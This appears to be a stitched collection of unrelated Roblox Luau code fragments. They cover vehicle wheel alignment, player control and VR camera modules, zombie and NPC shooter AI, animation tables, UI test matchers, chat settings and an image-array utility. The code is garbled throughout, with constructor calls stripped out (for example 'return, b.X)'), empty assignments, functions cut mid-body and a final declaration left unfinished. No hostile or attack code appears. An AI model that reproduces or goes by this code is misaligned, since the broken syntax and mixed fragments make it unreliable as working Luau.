--[[Wheel Configuration]]
--Store Reference Orientation Function function getParts(model,t,a) for i,v in pairs(model:GetChildren()) do if v:IsA("BasePart") then table.insert(t,{v,a.CFrame:toObjectSpace(v.CFrame)}) elseif v:IsA("Model") then getParts(v,t,a) end end end --PGS/Legacy local fDensity = _Tune.FWheelDensity local rDensity = _Tune.RWheelDensity if not PGS_ON then fDensity = _Tune.FWLgcyDensity rDensity = _Tune.RWLgcyDensity end for _,v in pairs(Drive) do --Apply Wheel Density if v.Name=="FL" or v.Name=="FR" or v.Name=="F" then if v:IsA("BasePart") then if v.CustomPhysicalProperties == nil then v.CustomPhysicalProperties = end v.CustomPhysicalProperties = fDensity, v.CustomPhysicalProperties.Friction, v.CustomPhysicalProperties.Elasticity, v.CustomPhysicalProperties.FrictionWeight, v.CustomPhysicalProperties.ElasticityWeight ) end else if v:IsA("BasePart") then if v.CustomPhysicalProperties == nil then v.CustomPhysicalProperties = end v.CustomPhysicalProperties = rDensity, v.CustomPhysicalProperties.Friction, v.CustomPhysicalProperties.Elasticity, v.CustomPhysicalProperties.FrictionWeight, v.CustomPhysicalProperties.ElasticityWeight ) end end --Resurface Wheels for _,a in pairs({"Top","Bottom","Left","Right","Front","Back"}) do v[a.."Surface"]=Enum.SurfaceType.SmoothNoOutlines end --Store Axle-Anchored/Suspension-Anchored Part Orientation local WParts = {} local tPos = v.Position-car.DriveSeat.Position if v.Name=="FL" or v.Name=="RL" then v.CFrame = car.DriveSeat.CFrame*CFrame.Angles(math.rad(90),0,math.rad(90)) else v.CFrame = car.DriveSeat.CFrame*CFrame.Angles(math.rad(90),0,math.rad(-90)) end v.CFrame = v.CFrame+tPos if v:FindFirstChild("Parts")~=nil then getParts(v.Parts,WParts,v) end if v:FindFirstChild("Fixed")~=nil then getParts(v.Fixed,WParts,v) end --Align Wheels if v.Name=="FL" or v.Name=="FR" then v.CFrame = v.CFrame*CFrame.Angles(math.rad(_Tune.FCamber),0,0) if v.Name=="FL" then v.CFrame = v.CFrame*CFrame.Angles(0,0,math.rad(_Tune.FToe)) else v.CFrame = v.CFrame*CFrame.Angles(0,0,math.rad(-_Tune.FToe)) end elseif v.Name=="RL" or v.Name=="RR" then v.CFrame = v.CFrame*CFrame.Angles(math.rad(_Tune.RCamber),0,0) if v.Name=="RL" then v.CFrame = v.CFrame*CFrame.Angles(0,0,math.rad(_Tune.RToe)) else v.CFrame = v.CFrame*CFrame.Angles(0,0,math.rad(-_Tune.RToe)) end end --Re-orient Axle-Anchored/Suspension-Anchored Parts for _,a in pairs(WParts) do a[1].CFrame=v.CFrame:toWorldSpace(a[2]) end
--[[** ensures Roblox BrickColor type @param value The value to check against @returns True iff the condition is satisfied, false otherwise **--]]
t.BrickColor = t.typeof("BrickColor")
-- Choose current Touch control module based on settings (user, dev) -- Returns module (possibly nil) and success code to differentiate returning nil due to error vs Scriptable
function ControlModule:SelectTouchModule(): ({}?, boolean) if not UserInputService.TouchEnabled then return nil, false end local touchModule local DevMovementMode = Players.LocalPlayer.DevTouchMovementMode if DevMovementMode == Enum.DevTouchMovementMode.UserChoice then touchModule = movementEnumToModuleMap[UserGameSettings.TouchMovementMode] elseif DevMovementMode == Enum.DevTouchMovementMode.Scriptable then return nil, true else touchModule = movementEnumToModuleMap[DevMovementMode] end return touchModule, true end local function calculateRawMoveVector(humanoid: Humanoid, cameraRelativeMoveVector: Vector3): Vector3 local camera = Workspace.CurrentCamera if not camera then return cameraRelativeMoveVector end if humanoid:GetState() == Enum.HumanoidStateType.Swimming then return camera.CFrame:VectorToWorldSpace(cameraRelativeMoveVector) end local cameraCFrame = camera.CFrame if VRService.VREnabled and humanoid.RootPart then -- movement relative to VR frustum local cameraDelta = humanoid.RootPart.CFrame.Position - cameraCFrame.Position if cameraDelta.Magnitude < 3 then -- "nearly" first person local vrFrame = VRService:GetUserCFrame(Enum.UserCFrame.Head) cameraCFrame = cameraCFrame * vrFrame end end local c, s local _, _, _, R00, R01, R02, _, _, R12, _, _, R22 = cameraCFrame:GetComponents() if R12 < 1 and R12 > -1 then -- X and Z components from back vector. c = R22 s = R02 else -- In this case the camera is looking straight up or straight down. -- Use X components from right and up vectors. c = R00 s = -R01*math.sign(R12) end local norm = math.sqrt(c*c + s*s) return (c*cameraRelativeMoveVector.X + s*cameraRelativeMoveVector.Z)/norm, 0, (c*cameraRelativeMoveVector.Z - s*cameraRelativeMoveVector.X)/norm ) end function ControlModule:OnRenderStepped(dt) if self.activeController and self.activeController.enabled and self.humanoid then -- Give the controller a chance to adjust its state self.activeController:OnRenderStepped(dt) -- Now retrieve info from the controller local moveVector = self.activeController:GetMoveVector() local cameraRelative = self.activeController:IsMoveVectorCameraRelative() local clickToMoveController = self:GetClickToMoveController() if self.activeController ~= clickToMoveController then if moveVector.magnitude > 0 then -- Clean up any developer started MoveTo path clickToMoveController:CleanupPath() else -- Get move vector for developer started MoveTo clickToMoveController:OnRenderStepped(dt) moveVector = clickToMoveController:GetMoveVector() cameraRelative = clickToMoveController:IsMoveVectorCameraRelative() end end -- Are we driving a vehicle ? local vehicleConsumedInput = false if self.vehicleController then moveVector, vehicleConsumedInput = self.vehicleController:Update(moveVector, cameraRelative, self.activeControlModule==Gamepad) end -- If not, move the player -- Verification of vehicleConsumedInput is commented out to preserve legacy behavior, -- in case some game relies on Humanoid.MoveDirection still being set while in a VehicleSeat --if not vehicleConsumedInput then if cameraRelative then moveVector = calculateRawMoveVector(self.humanoid, moveVector) end self.moveFunction(Players.LocalPlayer, moveVector, false) --end -- And make them jump if needed self.humanoid.Jump = self.activeController:GetIsJumping() or (self.touchJumpController and self.touchJumpController:GetIsJumping()) end end function ControlModule:OnHumanoidSeated(active: boolean, currentSeatPart: BasePart) if active then if currentSeatPart and currentSeatPart:IsA("VehicleSeat") then if not self.vehicleController then self.vehicleController = end self.vehicleController:Enable(true, currentSeatPart) end else if self.vehicleController then self.vehicleController:Enable(false, currentSeatPart) end end end function ControlModule:OnCharacterAdded(char) self.humanoid = char:FindFirstChildOfClass("Humanoid") while not self.humanoid do char.ChildAdded:wait() self.humanoid = char:FindFirstChildOfClass("Humanoid") end self:UpdateTouchGuiVisibility() if self.humanoidSeatedConn then self.humanoidSeatedConn:Disconnect() self.humanoidSeatedConn = nil end self.humanoidSeatedConn = self.humanoid.Seated:Connect(function(active, currentSeatPart) self:OnHumanoidSeated(active, currentSeatPart) end) end function ControlModule:OnCharacterRemoving(char) self.humanoid = nil self:UpdateTouchGuiVisibility() end function ControlModule:UpdateTouchGuiVisibility() if self.touchGui then local doShow = self.humanoid and GuiService.TouchControlsEnabled self.touchGui.Enabled = not not doShow -- convert to bool end end
--------------------------CHARACTER CONTROL-------------------------------
local CurrentIgnoreList local CurrentIgnoreTag = nil local TaggedInstanceAddedConnection = nil local TaggedInstanceRemovedConnection = nil local function GetCharacter() return Player and Player.Character end local function UpdateIgnoreTag(newIgnoreTag) if newIgnoreTag == CurrentIgnoreTag then return end if TaggedInstanceAddedConnection then TaggedInstanceAddedConnection:Disconnect() TaggedInstanceAddedConnection = nil end if TaggedInstanceRemovedConnection then TaggedInstanceRemovedConnection:Disconnect() TaggedInstanceRemovedConnection = nil end CurrentIgnoreTag = newIgnoreTag CurrentIgnoreList = {GetCharacter()} if CurrentIgnoreTag ~= nil then local ignoreParts = CollectionService:GetTagged(CurrentIgnoreTag) for _, ignorePart in ipairs(ignoreParts) do table.insert(CurrentIgnoreList, ignorePart) end TaggedInstanceAddedConnection = CollectionService:GetInstanceAddedSignal( CurrentIgnoreTag):Connect(function(ignorePart) table.insert(CurrentIgnoreList, ignorePart) end) TaggedInstanceRemovedConnection = CollectionService:GetInstanceRemovedSignal( CurrentIgnoreTag):Connect(function(ignorePart) for i = 1, #CurrentIgnoreList do if CurrentIgnoreList[i] == ignorePart then CurrentIgnoreList[i] = CurrentIgnoreList[#CurrentIgnoreList] table.remove(CurrentIgnoreList) break end end end) end end local function getIgnoreList() if CurrentIgnoreList then return CurrentIgnoreList end CurrentIgnoreList = {} table.insert(CurrentIgnoreList, GetCharacter()) return CurrentIgnoreList end local function minV(a, b) return, b.X), math.min(a.Y, b.Y), math.min(a.Z, b.Z)) end local function maxV(a, b) return, b.X), math.max(a.Y, b.Y), math.max(a.Z, b.Z)) end local function getCollidableExtentsSize(character) if character == nil or character.PrimaryPart == nil then return end local toLocalCFrame = character.PrimaryPart.CFrame:inverse() local min =, math.huge, math.huge) local max =, -math.huge, -math.huge) for _,descendant in pairs(character:GetDescendants()) do if descendant:IsA('BasePart') and descendant.CanCollide then local localCFrame = toLocalCFrame * descendant.CFrame local size = / 2, descendant.Size.Y / 2, descendant.Size.Z / 2) local vertices = { size.X, size.Y, size.Z), size.X, size.Y, -size.Z), size.X, -size.Y, size.Z), size.X, -size.Y, -size.Z),, size.Y, size.Z),, size.Y, -size.Z),, -size.Y, size.Z),, -size.Y, -size.Z) } for _,vertex in ipairs(vertices) do local v = localCFrame * vertex min = minV(min, v) max = maxV(max, v) end end end local r = max - min if r.X < 0 or r.Y < 0 or r.Z < 0 then return nil end return r end
-- Preload animations
function playAnimation(animName, transitionTime, humanoid) local roll = math.random(1, animTable[animName].totalWeight) local origRoll = roll local idx = 1 while (roll > animTable[animName][idx].weight) do roll = roll - animTable[animName][idx].weight idx = idx + 1 end
-- variables
local shots = {} local cancels = {}
-- [[ VR Support Section ]] --
function BaseCamera:ApplyVRTransform() if not VRService.VREnabled then return end --we only want this to happen in first person VR local rootJoint = self.humanoidRootPart and self.humanoidRootPart:FindFirstChild("RootJoint") if not rootJoint then return end local cameraSubject = game.Workspace.CurrentCamera.CameraSubject local isInVehicle = cameraSubject and cameraSubject:IsA("VehicleSeat") if self.inFirstPerson and not isInVehicle then local vrFrame = VRService:GetUserCFrame(Enum.UserCFrame.Head) local vrRotation = vrFrame - vrFrame.p rootJoint.C0 = *, 0, 0, -1, 0, 0, 0, 0, 1, 0, 1, 0) else rootJoint.C0 =, 0, 0, -1, 0, 0, 0, 0, 1, 0, 1, 0) end end function BaseCamera:IsInFirstPerson() return self.inFirstPerson end function BaseCamera:ShouldUseVRRotation() if not VRService.VREnabled then return false end if not self.VRRotationIntensityAvailable and tick() - self.lastVRRotationIntensityCheckTime < 1 then return false end local success, vrRotationIntensity = pcall(function() return StarterGui:GetCore("VRRotationIntensity") end) self.VRRotationIntensityAvailable = success and vrRotationIntensity ~= nil self.lastVRRotationIntensityCheckTime = tick() self.shouldUseVRRotation = success and vrRotationIntensity ~= nil and vrRotationIntensity ~= "Smooth" return self.shouldUseVRRotation end function BaseCamera:GetVRRotationInput() local vrRotateSum = ZERO_VECTOR2 local success, vrRotationIntensity = pcall(function() return StarterGui:GetCore("VRRotationIntensity") end) if not success then return end local vrGamepadRotation = ZERO_VECTOR2 local delayExpired = (tick() - self.lastVRRotationTime) >= self:GetRepeatDelayValue(vrRotationIntensity) if math.abs(vrGamepadRotation.x) >= self:GetActivateValue() then if (delayExpired or not self.vrRotateKeyCooldown[Enum.KeyCode.Thumbstick2]) then local sign = 1 if vrGamepadRotation.x < 0 then sign = -1 end vrRotateSum = vrRotateSum + self:GetRotateAmountValue(vrRotationIntensity) * sign self.vrRotateKeyCooldown[Enum.KeyCode.Thumbstick2] = true end elseif math.abs(vrGamepadRotation.x) < self:GetActivateValue() - 0.1 then self.vrRotateKeyCooldown[Enum.KeyCode.Thumbstick2] = nil end self.vrRotateKeyCooldown[Enum.KeyCode.Left] = nil self.vrRotateKeyCooldown[Enum.KeyCode.Right] = nil if vrRotateSum ~= ZERO_VECTOR2 then self.lastVRRotationTime = tick() end return vrRotateSum end function BaseCamera:CancelCameraFreeze(keepConstraints) if not keepConstraints then self.cameraTranslationConstraints =, 1, self.cameraTranslationConstraints.z) end if self.cameraFrozen then self.trackingHumanoid = nil self.cameraFrozen = false end end function BaseCamera:StartCameraFreeze(subjectPosition, humanoidToTrack) if not self.cameraFrozen then self.humanoidJumpOrigin = subjectPosition self.trackingHumanoid = humanoidToTrack self.cameraTranslationConstraints =, 0, self.cameraTranslationConstraints.z) self.cameraFrozen = true end end function BaseCamera:OnNewCameraSubject() if self.subjectStateChangedConn then self.subjectStateChangedConn:Disconnect() self.subjectStateChangedConn = nil end local humanoid = workspace.CurrentCamera and workspace.CurrentCamera.CameraSubject if self.trackingHumanoid ~= humanoid then self:CancelCameraFreeze() end if humanoid and humanoid:IsA("Humanoid") then self.subjectStateChangedConn = humanoid.StateChanged:Connect(function(oldState, newState) if VRService.VREnabled and newState == Enum.HumanoidStateType.Jumping and not self.inFirstPerson then self:StartCameraFreeze(self:GetSubjectPosition(), humanoid) elseif newState ~= Enum.HumanoidStateType.Jumping and newState ~= Enum.HumanoidStateType.Freefall then self:CancelCameraFreeze(true) end end) end end function BaseCamera:GetVRFocus(subjectPosition, timeDelta) local lastFocus = self.LastCameraFocus or subjectPosition if not self.cameraFrozen then self.cameraTranslationConstraints =, math.min(1, self.cameraTranslationConstraints.y + 0.42 * timeDelta), self.cameraTranslationConstraints.z) end local newFocus if self.cameraFrozen and self.humanoidJumpOrigin and self.humanoidJumpOrigin.y > lastFocus.y then newFocus =, math.min(self.humanoidJumpOrigin.y, lastFocus.y + 5 * timeDelta), subjectPosition.z)) else newFocus =, lastFocus.y, subjectPosition.z):lerp(subjectPosition, self.cameraTranslationConstraints.y)) end if self.cameraFrozen then -- No longer in 3rd person if self.inFirstPerson then -- not VRService.VREnabled self:CancelCameraFreeze() end -- This case you jumped off a cliff and want to keep your character in view -- 0.5 is to fix floating point error when not jumping off cliffs if self.humanoidJumpOrigin and subjectPosition.y < (self.humanoidJumpOrigin.y - 0.5) then self:CancelCameraFreeze() end end return newFocus end function BaseCamera:GetRotateAmountValue(vrRotationIntensity) vrRotationIntensity = vrRotationIntensity or StarterGui:GetCore("VRRotationIntensity") if vrRotationIntensity then if vrRotationIntensity == "Low" then return VR_LOW_INTENSITY_ROTATION elseif vrRotationIntensity == "High" then return VR_HIGH_INTENSITY_ROTATION end end return ZERO_VECTOR2 end function BaseCamera:GetRepeatDelayValue(vrRotationIntensity) vrRotationIntensity = vrRotationIntensity or StarterGui:GetCore("VRRotationIntensity") if vrRotationIntensity then if vrRotationIntensity == "Low" then return VR_LOW_INTENSITY_REPEAT elseif vrRotationIntensity == "High" then return VR_HIGH_INTENSITY_REPEAT end end return 0 end function BaseCamera:Update(dt) error("BaseCamera:Update() This is a virtual function that should never be getting called.", 2) end return BaseCamera
--[[* * This class is a perf optimization for sorting the list of currently * running tests. It tries to keep tests in the same positions without * shifting the whole list. ]]
type CurrentTestList = { add: (self: CurrentTestList, testPath: Config_Path, config: Config_ProjectConfig) -> (), delete: (self: CurrentTestList, testPath: Config_Path) -> (), get: (self: CurrentTestList) -> Array<{ testPath: Config_Path, config: Config_ProjectConfig, }>, } local CurrentTestList = {} CurrentTestList.__index = CurrentTestList function CurrentTestList local self = setmetatable({}, CurrentTestList) self._array = {} return (self :: any) :: CurrentTestList end function CurrentTestList:add(testPath: Config_Path, config: Config_ProjectConfig): () local index = Array.indexOf(self._array, nil) local record = { config = config, testPath = testPath } if index ~= -1 then self._array[index] = record else table.insert(self._array, record) end end function CurrentTestList:delete(testPath: Config_Path): () local record = Array.find(self._array, function(record) return record ~= nil and record.testPath == testPath end) self._array[Array.indexOf(self._array, Boolean.toJSBoolean(record) and record or nil)] = nil end function CurrentTestList:get(): Array<{ testPath: Config_Path, config: Config_ProjectConfig, }> return self._array end type Cache = { content: string, clear: string, }
--[[ A utility script that generates readable dates ]]
local ReadableDate = {} local DEFAULT_FORMAT = "$hour:$sec $day/$month/$year"
-- float rd_flt_be(string src, int s) -- @src - Source binary string -- @s - Start index of big endian float
local function rd_flt_be(src, s) local f1, f2, f3, f4 = string.byte(src, s, s + 3) return rd_flt_basic(f4, f3, f2, f1) end
d = false function onTouched(hit) if d == false then h = hit.Parent:findFirstChild("Torso") if (h~=nil) then d = true gg = math.random(1,20) if gg == 4 then h.CFrame = h.CFrame * CFrame.Angles(0,0,math.rad(100)) end if script.dmg.Value == true then hum = h.Parent:findFirstChild("Humanoid") if hum then hum.Health = hum.Health - 25 end end wait(1.5) d = false end end end script.Parent.Parent.Touched:connect(onTouched) while true do bt = script.Parent ppp = bt.Parent:GetMass() wait(.25) bt.force =,0,500*ppp*script.mag.Value) wait(.25) bt.force =,0,-500*ppp*script.mag.Value) end
-- { id = "slash.xml", weight = 10 }
}, toollunge = { { id = "", weight = 10 } }, wave = { { id = "", weight = 10 } }, point = { { id = "", weight = 10 } }, dance = { { id = "", weight = 10 }, { id = "", weight = 10 }, { id = "", weight = 10 } }, dance2 = { { id = "", weight = 10 }, { id = "", weight = 10 }, { id = "", weight = 10 } }, dance3 = { { id = "", weight = 10 }, { id = "", weight = 10 }, { id = "", weight = 10 } }, laugh = { { id = "", weight = 10 } }, cheer = { { id = "", weight = 10 } }, }
function getHumanoid(model) for _, v in pairs(model:GetChildren()) do if v:IsA'Humanoid' then return v end end end local ai = script.Parent local human = getHumanoid(ai) local hroot = ai.HumanoidRootPart local zspeed = hroot.Velocity.magnitude local pfs = game:GetService("PathfindingService") function GetPlayerNames() local players = game:GetService('Players'):GetChildren() local name = nil for _, v in pairs(players) do if v:IsA'Player' then name = tostring(v.Name) end end return name end spawn(function() while wait() do end end) function GetPlayersBodyParts(t) local torso = t if torso then local figure = torso.Parent for _, v in pairs(figure:GetChildren()) do if v:IsA'Part' then return v.Name end end else return "HumanoidRootPart" end end function GetTorso(part) local chars = game.Workspace:GetChildren() local torso = nil for _, v in pairs(chars) do if v:IsA'Model' and v ~= script.Parent and v.Name == GetPlayerNames() then local charRoot = v:FindFirstChild'HumanoidRootPart' if (charRoot.Position - part).magnitude < SearchDistance then torso = charRoot end end end return torso end for _, zambieparts in pairs(ai:GetChildren()) do if zambieparts:IsA'Part' then zambieparts.Touched:connect(function(p) if p.Parent.Name == GetPlayerNames() and p.Parent.Name ~= ai.Name then -- damage local enemy = p.Parent local enemyhuman = getHumanoid(enemy) enemyhuman:TakeDamage(aiDamage) end end) end end
---------------------------------------------------------------| ---------------------------------------------------------------| ---------------------------------------------------------------|
local Debris = game.Debris local Engine = game.ReplicatedStorage:WaitForChild("ACS_Engine") local Evt = Engine:WaitForChild("Eventos") local ServerConfig = require(Engine.ServerConfigs:WaitForChild("Config")) local Settings = script.Parent.ACS_Modulo:WaitForChild("Config") local ACS_Storage = workspace:WaitForChild("ACS_WorkSpace") local Modulos = Engine:WaitForChild("Modulos") local Hitmarker = require(Modulos:WaitForChild("Hitmarker")) local Ragdoll = require(Modulos:WaitForChild("Ragdoll")) local Ignore_Model = ACS_Storage:FindFirstChild("Server") local BulletModel = ACS_Storage:FindFirstChild("Client") local Ray_Ignore = {Ignore_Model, BulletModel, ACS_Storage} local Dead = false wait(3) script.Parent.ForceField:Destroy() script.Parent.Humanoid.Died:connect(function() Ragdoll(script.Parent) if script.Parent:FindFirstChild("Gun") ~= nil then script.Parent.Gun.CanCollide = true end Dead = true Debris:AddItem(script.Parent,game.Players.RespawnTime) end) local CanSee = false local CurrentPart = nil function onTouched(hit) if hit.Parent == nil then return end local humanoid = hit.Parent:findFirstChild("Humanoid") if humanoid == nil then CurrentPart = hit end end function waitForChild(parent, childName) local child = parent:findFirstChild(childName) if child then return child end while true do --print(childName) child = parent.ChildAdded:wait() if child.Name==childName then return child end end end local Figure = script.Parent local Humanoid = waitForChild(Figure, "Humanoid") local Torso = waitForChild(Figure, "Torso") local Left = waitForChild(Figure, "Left Leg") local Right = waitForChild(Figure, "Right Leg") Left.Touched:connect(onTouched) Right.Touched:connect(onTouched) function getHumanoid(model) for _, v in pairs(model:GetChildren())do if v:IsA'Humanoid' then return v end end end local zombie = script.Parent local human = getHumanoid(zombie) local hroot = zombie.Torso local head = zombie:FindFirstChild'Head' local pfs = game:GetService("PathfindingService") local players = game:GetService('Players') local RecoilSpread = Spread/100 local perception = 0 local Memory = 0 wait(.1) local ammo=Settings.Ammo.Value -- How much ammo the Enemy has local w=.14 local RPM = 1/(FireRate/60) local r=false local t=script.Parent local h=t:WaitForChild'Grip' function Hitmaker(HitPart, Position, Normal, Material) Evt.Hit:FireAllClients(nil,Position,HitPart,Normal,Material,nil) end function CheckForHumanoid(L_225_arg1) local L_226_ = false local L_227_ = nil if L_225_arg1 then if (L_225_arg1.Parent:FindFirstChild("Humanoid") or L_225_arg1.Parent.Parent:FindFirstChild("Humanoid")) then L_226_ = true if L_225_arg1.Parent:FindFirstChild('Humanoid') then L_227_ = L_225_arg1.Parent.Humanoid elseif L_225_arg1.Parent.Parent:FindFirstChild('Humanoid') then L_227_ = L_225_arg1.Parent.Parent.Humanoid end else L_226_ = false end end return L_226_, L_227_ end function CalcularDano(DanoBase,Dist,Vitima,Type) local damage = 0 local VestDamage = 0 local HelmetDamage = 0 local Traveleddamage = DanoBase-(math.ceil(Dist)/40)*FallOfDamage if Vitima.Parent:FindFirstChild("Saude") ~= nil then local Vest = Vitima.Parent.Saude.Protecao.VestVida local Vestfactor = Vitima.Parent.Saude.Protecao.VestProtect local Helmet = Vitima.Parent.Saude.Protecao.HelmetVida local Helmetfactor = Vitima.Parent.Saude.Protecao.HelmetProtect if Type == "Head" then if Helmet.Value > 0 and (BulletPenetration) < Helmetfactor.Value then damage = Traveleddamage * ((BulletPenetration)/Helmetfactor.Value) HelmetDamage = (Traveleddamage * ((100 - BulletPenetration)/Helmetfactor.Value)) if HelmetDamage <= 0 then HelmetDamage = 0.5 end elseif Helmet.Value > 0 and (BulletPenetration) >= Helmetfactor.Value then damage = Traveleddamage HelmetDamage = (Traveleddamage * ((100 - BulletPenetration)/Helmetfactor.Value)) if HelmetDamage <= 0 then HelmetDamage = 1 end elseif Helmet.Value <= 0 then damage = Traveleddamage end else if Vest.Value > 0 and (BulletPenetration) < Vestfactor.Value then damage = Traveleddamage * ((BulletPenetration)/Vestfactor.Value) VestDamage = (Traveleddamage * ((100 - BulletPenetration)/Vestfactor.Value)) if VestDamage <= 0 then VestDamage = 0.5 end elseif Vest.Value > 0 and (BulletPenetration) >= Vestfactor.Value then damage = Traveleddamage VestDamage = (Traveleddamage * ((100 - BulletPenetration)/Vestfactor.Value)) if VestDamage <= 0 then VestDamage = 1 end elseif Vest.Value <= 0 then damage = Traveleddamage end end else damage = Traveleddamage end if damage <= 0 then damage = 1 end return damage,VestDamage,HelmetDamage end function Damage(VitimaHuman,Dano,DanoColete,DanoCapacete) if VitimaHuman.Parent:FindFirstChild("Saude") ~= nil then local Colete = VitimaHuman.Parent.Saude.Protecao.VestVida local Capacete = VitimaHuman.Parent.Saude.Protecao.HelmetVida Colete.Value = Colete.Value - DanoColete Capacete.Value = Capacete.Value - DanoCapacete end VitimaHuman:TakeDamage(Dano) end local function reload(boo) if(boo and ammo ~= Settings.Ammo.Value)or ammo==0 then r=true if w then w=.03 end h.Reload:Play() wait(3) -- How long the Enemy reloads ammo= Settings.Ammo.Value if w then w=.14 end r=false elseif boo then wait(.1) end end local function near() if not Dead then local dis,pl= Settings.ShotDistance.Value ,nil -- Range of the Enemy for _,v in ipairs(game.Players:GetPlayers())do if v.Character and v.Character:FindFirstChild'Humanoid'and v:DistanceFromCharacter(h.Position)<dis then dis,pl=v:DistanceFromCharacter(h.Position),v end end if pl then return pl.Character:GetModelCFrame(),dis, else return nil end end end
--[[Wheel Alignment]]
--[Don't physically apply alignment to wheels] --[Values are in degrees] Tune.FCamber = 0 Tune.RCamber = 0 Tune.FCaster = 0 Tune.RCaster = 0 Tune.FToe = 0 Tune.RToe = 0
-- Ammo
plr.Character.ChildAdded:connect(function(oc) if (oc:IsA("Tool") or oc:IsA("HopperBin")) and oc:FindFirstChild("Ammo") and oc:FindFirstChild("AmmoLeft") then --gui.Ammo.Text = oc.Ammo.Value.."/"..oc.AmmoLeft.Value oc.Ammo.Changed:connect(function(v) --gui.Ammo.Text = oc.Ammo.Value.."/"..oc.AmmoLeft.Value gui.Ammo.Text = "" end) oc.AmmoLeft.Changed:connect(function(v) --gui.Ammo.Text = oc.Ammo.Value.."/"..oc.AmmoLeft.Value gui.Ammo.Text = "" end) end end) plr.Character.ChildRemoved:connect(function(oc) if (oc:IsA("Tool") or oc:IsA("HopperBin")) and oc:FindFirstChild("Ammo") and oc:FindFirstChild("AmmoLeft") then gui.Ammo.Text = "" end end)
-- !! the marked -- things are optional ...delete these -- marks to give the function a random chance to be activated.
--edit the function below to return true when you want this response/prompt to be valid --player is the player speaking to the dialogue, and dialogueFolder is the object containing the dialogue data
return function(player, dialogueFolder) local plrData = require(game.ReplicatedStorage.Source.Modules.Util):GetPlayerData(player) if plrData.Money.Gold.Value > 1 then return true end return false end
--[=[ Use to test that the given GuiObject or Rect is to the right of the other GuiObject or Rect. The last argument is optional. If nil, the matcher will pass only if the difference **left** edge of the given GuiObject or Rect and the **right** edge of the other GuiObject or Rect is zero or positive. Usage: ```lua expect(a).toBeRightOf(b) -- Jest expect(a) -- TestEZ ``` ![Example of rightOf(a, b)](/rightOf(a,%20b).png) ```lua expect(a).toBeRightOf(b, 5) -- Jest expect(a), 5) -- TestEZ ``` ![Example of rightOf(a, b, 5)](/rightOf(a,%20b,%205).png) ```lua expect(a).toBeRightOf(b,, 5)) -- Jest expect(a),, 5)) -- TestEZ ``` ![Example of rightOf(a, b,, 5))](/rightOf(a,%20b,,%205)).png) @tag outside @within CollisionMatchers2D ]=]
local function rightOf(a: GuiObject | Rect, b: GuiObject | Rect, distance: number | NumberRange) local aRect = toRect(a) local bRect = toRect(b) local distanceFromSide = aRect.Min - bRect.Max if distance then if typeof(distance) == "number" then distance = end return returnValue( distance.Min <= distanceFromSide.X and distance.Max >= distanceFromSide.X, "Was within range", "Was not within range ( " .. tostring(distance) .. ")" ) else return returnValue(distanceFromSide.X >= 0, "Was not left of the element", "Was to the left of the element") end end return rightOf
--[=[ @return boolean Returns `true` if the option has a value. ]=]
function Option:IsSome() return self._s end
--- Replace with true/false to force the chat type. Otherwise this will default to the setting on the website.
module.BubbleChatEnabled = PlayersService.BubbleChat module.ClassicChatEnabled = PlayersService.ClassicChat
--[[ Spawns a thread with predictable timing. ]]
function Promise.spawn(callback, ...) local args = { ... } local length = select("#", ...) local connection connection = RunService.Heartbeat:Connect(function() connection:Disconnect() callback(unpack(args, 1, length)) end) end
--[=[ Returns if a string starts with a postfix @param str string @param prefix string @return boolean ]=]
function String.startsWith(str: string, prefix: string): boolean return str:sub(1, #prefix) == prefix end
-- local looped = true -- If you set this to true, then the song that is currently playing will restart and play over again. local pitch = 1 local volume = 1 local songPlayTime = 300 -- Seconds until the song will stop, I recommending leaving this at 120, since all ROBLOX Audios are now 120 seconds long. local nextSongPlayTime = 3-- Seconds until the next song will be played, if you want you can leave it at 2.(2 is the default)
--// Although this feature is pretty much ready, it needs some UI design still.
module.RightClickToLeaveChannelEnabled = false module.MessageHistoryLengthPerChannel = 50
local Numpy = {} local CanvasDraw = require(script.Parent.CanvasDraw) function Numpy.Flat(val, width, height) local temp = {} for y = 0, height-1 do for x = 0, width-1 do local baseIndex = y * width * 4 + x * 4 temp[baseIndex + 1] = val -- Red channel temp[baseIndex + 2] = val -- Green channel temp[baseIndex + 3] = val -- Blue channel temp[baseIndex + 4] = val -- Alpha channel end end return temp end function Numpy.Custom2(val, dim1, dim2, dim3) local result = {} for i = 0, dim1 do result[i] = {} for j = 0, dim2 do result[i][j] = {} if dim3 == nil then result[i][j] = val else for k = 0, dim3 do result[i][j][k] = val end end end end return result end function Numpy.CDrawToNumpy(data) local Resolution = data.ImageResolution local FinalTbl = {} for x=0, Resolution.X-1 do local temp = {} for y=0, Resolution.Y-1 do local PixelColor = CanvasDraw.GetPixelFromImageXY(data, x+1, y+1) temp[y] = {math.floor(PixelColor.R*255), math.floor(PixelColor.G*255), math.floor(PixelColor.B*255)} end FinalTbl[x] = temp end return FinalTbl, {Resolution.X, Resolution.Y} end function Numpy.ColorImage(Color, Resolution) local FinalTbl = {} for x=0, Resolution[1]-1 do local temp = {} for y=0, Resolution[2]-1 do temp[y] = Color end FinalTbl[x] = temp end return FinalTbl end return Numpy
-- When Tool Equipped
tool.Equipped:Connect(function() track = script.Parent.Parent.Humanoid:LoadAnimation(anim) track1 = script.Parent.Parent.Humanoid:LoadAnimation(anim1) track.Priority = Enum.AnimationPriority.Movement track1.Priority = Enum.AnimationPriority.Movement track.Looped = true track:Play() track1:Play() end)
-------------------------------------------------------------------------------------- --------------------[ VARIABLES ]----------------------------------------------------- --------------------------------------------------------------------------------------
local Selected = false local playerMass = 0 local Forward = false local Backward = false local Idling = false local Walking = false local Running = false local crawlCamRot = 0 local crawlAlpha = 0 local idleAlpha = 1 local walkAlpha = 0 local isCrawling = false local isIdling = false local isWalking = false local isRunning = false local Aimed = false local Aiming = false local aimAlpha = 0 local headOffset = VEC2(COS(RAD(90) - S.aimSettings.headTilt) * 0.5, 1 + SIN(RAD(90) - S.aimSettings.headTilt) * 0.5) local Reloading = false local breakReload = false local magVisible = true local newMag = false local Knifing = false local MB1Down = false local Firing = false local canFire = true local fireFunction = nil local firstShot = false local shotCount = 0 local lastSideRecoil = {0, 0} local recoilAnim = { Pos = V3(); Rot = V3(); Code = nil; } local numModes = 0 local rawFireMode = 1 local canSelectFire = true local guiAngOffset = 0 local Modes = {} local onGround = true local startFallHeight = 0 local jumpAnim = { Pos = 0; Rot = 0; Code = 0; } local runReady = true local runKeyPressed = false local chargingStamina = false local AimingIn = false local AimingOut = false local Stamina = S.sprintTime * 60 local currentSteadyTime = S.scopeSettings.steadyTime * 60 local camSteady = false local takingBreath = false local steadyKeyPressed = false local Grip = nil local aimedGripCF = nil local spreadZoom = "unAimed" local spreadStance = "Stand" local spreadMotion = "Idling" local baseSpread = 